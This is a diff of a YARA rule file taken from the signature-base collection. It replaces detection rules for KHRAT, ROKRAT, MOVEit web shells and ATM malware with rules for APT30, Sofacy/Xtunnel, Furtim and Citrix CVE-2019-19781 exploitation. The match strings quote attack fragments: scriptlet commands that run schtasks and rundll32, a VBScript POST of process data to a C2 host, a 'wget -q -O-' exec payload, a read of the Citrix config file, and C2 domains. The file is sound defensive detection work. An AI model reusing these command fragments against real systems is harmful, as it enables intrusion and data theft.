 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L26-L41"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1165-L1186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c27a89028794b50b95850d90ee29b56606e6b58b862a26e287077e7f7be7f096"
+		logic_hash = "ff7473e43e11e31fe6ad997009834f661a0120317e479184410456c99f72b613"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3"
+		super_rule = 1
+		hash0 = "b9aafb575d3d1732cb8fdca5ea226cebf86ea3c9"
+		hash1 = "2c5e347083b77c9ead9e75d41e2fabe096460bba"
+		hash2 = "5d39a567b50c74c4a921b5f65713f78023099933"
 
 	strings:
-		$x1 = "CreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn" ascii
-		$x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii
-		$x3 = "<registration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" >" fullword ascii
+		$s0 = "GetStar" fullword
+		$s1 = ".rdUaS" fullword
+		$s2 = "%sOTwp/&A\\L" fullword
+		$s3 = "a Encrt% Flash Disk" fullword
+		$s4 = "ypeAutoRuChec" fullword
+		$s5 = "NoDriveT" fullword
 
 	condition:
-		1 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_KHRAT_Scritplet : FILE
+rule SIGNATURE_BASE_APT30_Generic_7 : FILE
 {
 	meta:
-		description = "Rule derived from KHRAT scriptlet"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f72d68a3-0409-5401-b6a1-ca8f188d7409"
-		date = "2017-08-31"
+		id = "bba40092-267b-5231-92f1-f222c9f888ee"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L43-L62"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1188-L1206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbbabd8e2f17827d96aeef4ea362f133cf3fcc31716c517b86a05a010ff62510"
+		logic_hash = "b5a272cbeb46be9b120acdbe12d795eddc05765777e4157d818c2b91ea7b782b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdb9104636a6f7c6018fe99bc18fb8b542689a84c23c10e9ea13d5aa275fd40e"
+		super_rule = 1
+		hash0 = "2415f661046fdbe3eea8cd276b6f13354019b1a6"
+		hash1 = "e814914079af78d9f1b71000fee3c29d31d9b586"
+		hash2 = "0263de239ccef669c47399856d481e3361408e90"
 
 	strings:
-		$x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii
-		$x2 = "Process=Process & Chr(32) & Chr(32) & Chr(32) & Obj.Description" fullword ascii
-		$s1 = "http.SetRequestHeader \"Content-Type\", \"application/json\" " fullword ascii
-		$s2 = "Dim http,WMI,Objs,Process" fullword ascii
-		$s3 = "Set Objs=WMI.InstancesOf(\"Win32_Process\")" fullword ascii
-		$s4 = "'WScript.Echo http.responseText " fullword ascii
+		$s1 = "Xjapor_*ata" fullword
+		$s2 = "Xjapor_o*ata" fullword
+		$s4 = "Ouopai" fullword
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 1KB and ( 1 of ( $x* ) or 4 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_ATM_Malware_Dispenserxfs_1 : FILE
+rule SIGNATURE_BASE_APT30_Generic_8 : FILE
 {
 	meta:
-		description = "Detects ATM Malware DispenserXFS"
-		author = "@Xylit0l @r3c0nst / Modified by Florian Roth"
-		id = "7c06102c-93d3-52f4-8c25-430f6f7a601f"
-		date = "2019-02-27"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/r3c0nst/status/1100775857306652673"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_dispenserxfs.yar#L4-L24"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a6845222-0a3e-5327-a448-36e8d54362a5"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1207-L1232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c7331b29f7cd8c40f99e235664f86361ba99c9ca0092c1cfb6faf367764303e"
-		score = 80
+		logic_hash = "2c240d2a35ce3d621d108d03d4e720ddf86e248047fb4dd7f9724e64020caa7f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b47e20ac5889700438dc241f28f4e224070810d2"
+		hash1 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
+		hash2 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
 
 	strings:
-		$xc1 = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
-		$s1 = "\\dispenserXFS.pdb" ascii
-		$s3 = "C:\\xfsasdf.txt" fullword ascii
-		$s4 = "Injected mxsfs killer into %d." fullword ascii
-		$s5 = "Waiting for freeze msxfs processes..." fullword ascii
+		$s0 = "Windows NT4.0" fullword
+		$s1 = "Windows NT3.51" fullword
+		$s2 = "%d;%d;%d;%ld;%ld;%ld;" fullword
+		$s3 = "%s %d.%d Build%d %s" fullword
+		$s4 = "MSAFD Tcpip [TCP/IP]" fullword
+		$s5 = "SQSRSS" fullword
+		$s8 = "WM_COMP" fullword
+		$s9 = "WM_MBU" fullword
+		$s11 = "WM_GRID" fullword
+		$s12 = "WM_RBU" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of them or pe.imphash ( ) == "617e037ae26d1931818db0790fb44bfe" )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Saudi_Phish_Trojan : FILE
+rule SIGNATURE_BASE_APT30_Generic_9 : FILE
 {
 	meta:
-		description = "Detects a trojan used in Saudi Aramco Phishing"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d805391d-1256-5dac-8585-ccf3391d4e91"
-		date = "2017-10-12"
+		id = "cf259f8d-e0a9-579d-93e7-ec14d99faf81"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Z3JUAA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_saudi_aramco_phish.yar#L10-L27"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1234-L1255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f7199d2e408cc057d88234e4041c7d87652d1ed361eaaf75bb37da45900e9f38"
+		logic_hash = "0b30c2f0bd654371bf3ac4f9d4e700e1544b62a6c0a072d506160c443fc5fe9d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91"
+		super_rule = 1
+		hash0 = "00d9949832dc3533592c2ce06a403ef19deddce9"
+		hash1 = "27a2b981d4c0bb8c3628bfe990db4619ddfdff74"
+		hash2 = "05f66492c163ec2a24c6a87c7a43028c5f632437"
+		hash3 = "263f094da3f64e72ef8dc3d02be4fb33de1fdb96"
 
 	strings:
-		$s1 = { 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09
-               2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00
-               70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00
-               70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00
-               65 00 78 00 65 }
+		$s0 = "%s\\%s\\$NtRecDoc$" fullword
+		$s1 = "%s(%u)%s" fullword
+		$s2 = "http://%s%s%s" fullword
+		$s3 = "1.9.1.17" fullword wide
+		$s4 = "(C)Firefox and Mozilla Developers, according to the MPL 1.1/GPL 2.0/LGPL" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_DLL_Moveit_Jun23_1 : FILE
+rule SIGNATURE_BASE_Apt_Sofacy_Xtunnel : FILE
 {
 	meta:
-		description = "Detects compiled ASPX web shells found being used in MOVEit Transfer exploitation"
-		author = "Florian Roth"
-		id = "47db8602-9a9e-5efc-b8b9-fbc4f3c8d4e9"
-		date = "2023-06-01"
+		description = "Sofacy Malware - German Bundestag"
+		author = "Claudio Guarnieri"
+		id = "aef091b5-cedf-5443-ab61-8b2dbc7e77fd"
+		date = "2016-02-15"
 		modified = "2023-12-05"
-		reference = "https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/?utm_content=251159938&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L2-L22"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47c2ec1e833852941434586b61d6f435b9acb32b2ff48e0a9e8006e0f9ff8056"
-		score = 85
+		logic_hash = "2478d9d8996bf4a142e39eac0e2d6af718d364be080a89530812615595777efd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6cbf38f5f27e6a3eaf32e2ac73ed02898cbb5961566bb445e3c511906e2da1fa"
 
 	strings:
-		$x1 = "human2_aspx" ascii fullword
-		$x2 = "X-siLock-Comment" wide
-		$x3 = "x-siLock-Step1" wide
-		$a1 = "MOVEit.DMZ.Core.Data" ascii fullword
+		$xaps = ":\\PROJECT\\XAPS_"
+		$variant11 = "XAPS_OBJECTIVE.dll"
+		$variant12 = "start"
+		$variant21 = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
+		$variant22 = "is you live?"
+		$mix1 = "176.31.112.10"
+		$mix2 = "error in select, errno %d"
+		$mix3 = "no msg"
+		$mix4 = "is you live?"
+		$mix5 = "127.0.0.1"
+		$mix6 = "err %d"
+		$mix7 = "i`m wait"
+		$mix8 = "hello"
+		$mix9 = "OpenSSL 1.0.1e 11 Feb 2013"
+		$mix10 = "Xtunnel.exe"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and $a1 ) or all of them
+		(( uint16( 0 ) == 0x5A4D ) or ( uint16( 0 ) == 0xCFD0 ) ) and ( ( $xaps ) or ( all of ( $variant1* ) ) or ( all of ( $variant2* ) ) or ( 6 of ( $mix* ) ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Moveit_Jun23_1 : FILE
+
+rule SIGNATURE_BASE_Winexe_Remoteexec : FILE
 {
 	meta:
-		description = "Detects ASPX web shells as being used in MOVEit Transfer exploitation"
-		author = "Florian Roth"
-		id = "2c789b9c-5ec5-5fd1-84e3-6bf7735a9488"
-		date = "2023-06-01"
-		modified = "2023-12-05"
-		reference = "https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L24-L41"
+		description = "Winexe tool for remote execution (also used by Sofacy group)"
+		author = "Florian Roth (Nextron Systems), Robert Simmons"
+		id = "5079557a-0461-5b04-b0f2-4265bf7ec041"
+		date = "2015-06-19"
+		modified = "2021-02-11"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L26-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "436f9a503ad938541faa8f34604310ba6d932e40a41dc189ccd293b7191a7621"
-		score = 85
+		logic_hash = "9e944f07b43b934346c0e88685014c05ff81561ac2f7c3374b55b9c4523b98c1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5"
-		hash2 = "48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a"
-		hash3 = "e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e"
+		hash1 = "5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d"
+		hash2 = "d19dfdbe747e090c5aa2a70cc10d081ac1aa88f360c3f378288a3651632c4429"
 
 	strings:
-		$s1 = "X-siLock-Comment" ascii fullword
-		$s2 = "]; string x = null;" ascii
-		$s3 = ";  if (!String.Equals(pass, " ascii
+		$s1 = "error Cannot LogonUser(%s,%s,%s) %d" ascii fullword
+		$s2 = "error Cannot ImpersonateNamedPipeClient %d" ascii fullword
+		$s3 = "\\\\.\\pipe\\ahexec" fullword ascii
+		$s4 = "\\\\.\\pipe\\wmcex" fullword ascii
+		$s5 = "implevel" fullword ascii
 
 	condition:
-		filesize < 150KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and ( 3 of them or pe.imphash ( ) == "2f8a475933ac82b8e09eaf26b396b54d" )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_1
+rule SIGNATURE_BASE_Sofacy_Mal2 : FILE
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
-		author = "Florian Roth"
-		id = "a7c521b8-c654-51dd-9d5b-4ba883feffe3"
-		date = "2023-06-01"
+		description = "Sofacy Group Malware Sample 2"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1547cc67-7d7c-5ec9-816c-15b7d523376a"
+		date = "2015-06-19"
 		modified = "2023-12-05"
-		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L43-L56"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L50-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26674d8dea5cb2e95e442c4c75d80ca610f7373f0b216c0b1c83a5b1f9f70316"
+		hash = "566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092"
+		logic_hash = "c325ed815b7de3338363d064f4097edf0596644d4ef8d642fda3664a2a16c2eb"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "POST /moveitisapi/moveitisapi.dll action=m2 " ascii
-		$x2 = " GET /human2.aspx - 443 " ascii
+		$x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
+		$x2 = "XAPS_OBJECTIVE.dll" fullword ascii
+		$s1 = "i`m wait" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) and $s1
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_2
+rule SIGNATURE_BASE_Sofacy_Mal3 : FILE
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
-		author = "Florian Roth"
-		id = "1527f5e3-071d-5152-9452-9c4472d258f2"
-		date = "2023-06-03"
-		modified = "2023-12-05"
-		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L58-L79"
+		description = "Sofacy Group Malware Sample 3"
+		author = "Florian Roth (Nextron Systems)"
+		id = "67d002ef-4ed9-54ce-a6ef-49b7f3b951e2"
+		date = "2015-06-19"
+		modified = "2023-01-06"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L69-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "56328d078801a702ad47f01f356df6f00be8da593d03c549e77312af9b47b5be"
+		hash = "5f6b2a0d1d966fc4f1ed292b46240767f4acb06c13512b0061b434ae2a692fa1"
+		logic_hash = "80c433cf5b3d042e46b5441a1b027c5ecf571f30571064904a33e92677633e66"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.102+Safari/537.36" ascii
-		$a2 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36" ascii
-		$s1 = " POST /moveitisapi/moveitisapi.dll" ascii
-		$s2 = " POST /guestaccess.aspx"
-		$s3 = " POST /api/v1/folders/"
-		$s4 = "/files uploadType=resumable&"
-		$s5 = " action=m2 "
+		$s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
+		$s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
+		$s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
+		$s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
+		$s5 = ".winnt.check-fix.com" ascii
+		$s6 = ".update.adobeincorp.com" ascii
+		$s7 = ".microsoft.checkwinframe.com" ascii
+		$s8 = "adobeincorp.com" fullword wide
+		$s9 = "# EXC: HttpSender - Cannot create Get Channel!" fullword ascii
+		$x1 = "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/" wide
+		$x2 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2" wide
+		$x3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
 
 	condition:
-		1 of ( $a* ) and 3 of ( $s* ) or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 2 of ( $s* ) or ( 1 of ( $s* ) and all of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_3
+rule SIGNATURE_BASE_Sofacy_Bundestag_Batch : FILE
 {
 	meta:
-		description = "Detects a potential compromise indicator found in MOVEit DMZ Web API logs"
-		author = "Nasreddine Bencherchali"
-		id = "113a501f-d9ed-51fd-82cd-ccb6f02833bd"
-		date = "2023-06-13"
+		description = "Sofacy Bundestags APT Batch Script"
+		author = "Florian Roth (Nextron Systems)"
+		id = "869dafec-1387-5640-b608-b84cf0d43342"
+		date = "2015-06-19"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_moveit_0day_jun23.yar#L81-L94"
+		reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_xtunnel_bundestag.yar#L101-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2eaa06c31687c6368f036a705fdc1b1c42355f19c098ae764a998039cc4aebb5"
+		logic_hash = "05d6df161042a65f9eeec4be4046001a03fa61747a9ea123f13e6e75d6664ac7"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "TargetInvocationException" ascii
-		$s2 = "MOVEit.DMZ.Application.Folders.ResumableUploadFilePartHandler.DeserializeFileUploadStream" ascii
+		$s1 = "for %%G in (.pdf, .xls, .xlsx, .doc, .docx)" ascii
+		$s2 = "cmd /c copy"
+		$s3 = "forfiles"
 
 	condition:
-		all of ( $s* )
+		filesize < 10KB and 2 of them
 }
-rule SIGNATURE_BASE_ROKRAT_Malware : FILE
+rule SIGNATURE_BASE_Furtim_Nativedll : FILE
 {
 	meta:
-		description = "Detects ROKRAT Malware"
+		description = "Detects Furtim malware - file native.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52e7e144-b704-5254-9a0f-928fbc96f877"
-		date = "2017-04-03"
-		modified = "2021-09-14"
-		reference = "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L8-L34"
+		id = "4639b637-55d3-5591-9278-5a21de23ac72"
+		date = "2016-06-13"
+		modified = "2023-12-05"
+		reference = "MISP 3971"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_furtim.yar#L8-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8b8fa3f97ce13e501cc25b89e2cfdaf785f1cb9f57a9dbd3461596b1bc6178c2"
+		logic_hash = "f9673cdd1e8e38f98b9625291a03011d5cfce78c689eab491ff189c4e039e1ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00"
-		hash2 = "cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c"
+		hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
 
 	strings:
-		$x1 = "c:\\users\\appdata\\local\\svchost.exe" fullword ascii
-		$x2 = "c:\\temp\\episode3.mp4" fullword ascii
-		$x3 = "MAC-SIL-TED-FOO-YIM-LAN-WAN-SEC-BIL-TAB" ascii
-		$x4 = "c:\\temp\\%d.tmp" ascii fullword
-		$s1 = "%s%s%04d%02d%02d%02d%02d%02d.jar" fullword ascii
-		$s2 = "\\Aboard\\Acm%c%c%c.exe" ascii
-		$a1 = "ython" ascii fullword
-		$a2 = "iddler" ascii fullword
-		$a3 = "egmon" ascii fullword
-		$a6 = "iresha" ascii fullword
+		$s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
+		$op0 = { e0 b3 42 00 c7 84 24 ac }
+		$op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 }
+		$op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25000KB and ( 1 of ( $x* ) or ( 5 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and $s1 or all of ( $op* )
 }
-
-rule SIGNATURE_BASE_ROKRAT_Dropper_Nov17 : FILE
+rule SIGNATURE_BASE_Furtim_Parent_1 : FILE
 {
 	meta:
-		description = "Detects dropper for ROKRAT malware"
+		description = "Detects Furtim Parent Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f3156a2-6b1b-5c65-b8fa-84c0b739d703"
-		date = "2017-11-28"
+		id = "a47719d2-1e4f-50a9-b340-55e13f5a24d5"
+		date = "2016-07-16"
 		modified = "2023-12-05"
-		reference = "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rokrat.yar#L48-L61"
+		reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_furtim.yar#L34-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a444342a4fb4d10aaf8efb5c26954847ce1089c9cec37d1ab3b03e0ac566c6c"
+		logic_hash = "ab4c7ca5c887b2a2f2949a5a6fd0d623dad47d9c1f866fb43f7f8ec38dfa6a02"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14"
-		hash2 = "a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037"
+		hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
+
+	strings:
+		$x1 = "dqrChZonUF" fullword ascii
+		$s1 = "Egistec" fullword wide
+		$s2 = "Copyright (C) 2016" fullword wide
+		$op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
+		$op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
+		$op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( $x1 or ( all of ( $s* ) and all of ( $op* ) ) ) ) or all of them
+}
+rule SIGNATURE_BASE_EXPL_Shitrix_Exploit_Code_Jan20_1 : FILE CVE_2019_19781
+{
+	meta:
+		description = "Detects payloads used in Shitrix exploitation CVE-2019-19781"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fab3a9b-82a5-573a-b210-2ae65f1a7f24"
+		date = "2020-01-13"
+		modified = "2023-12-05"
+		reference = "https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+Overview+of+Observed+Payloads/25704/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_shitrix.yar#L2-L29"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "00687b30235be5ef3c00432b5b96bbc325dee553e7c0cb565d6f389b1bce12de"
+		score = 70
+		quality = 85
+		tags = "FILE, CVE-2019-19781"
+
+	strings:
+		$s01 = "/netscaler/portal/scripts/rmpm.pl" ascii
+		$s02 = "tee /netscaler/portal/templates/" ascii
+		$s03 = "exec(\\'(wget -q -O- http://" ascii
+		$s04 = "cd /netscaler/portal; ls" ascii
+		$s05 = "cat /flash/nsconfig/ns.conf" ascii
+		$s06 = "/netscaler/portal/scripts/PersonalBookmak.pl" ascii
+		$s07 = "template.new({'BLOCK'='print readpipe(" ascii
+		$s08 = "pwnpzi1337" fullword ascii
+		$s09 = "template.new({'BLOCK'="
+		$s10 = "template.new({'BLOCK'%3d"
+		$s11 = "my ($citrixmd, %FORM);"
+		$s12 = "(CMD, \"($citrixmd) 2>&1"
+		$b1 = "NSC_USER:" ascii nocase
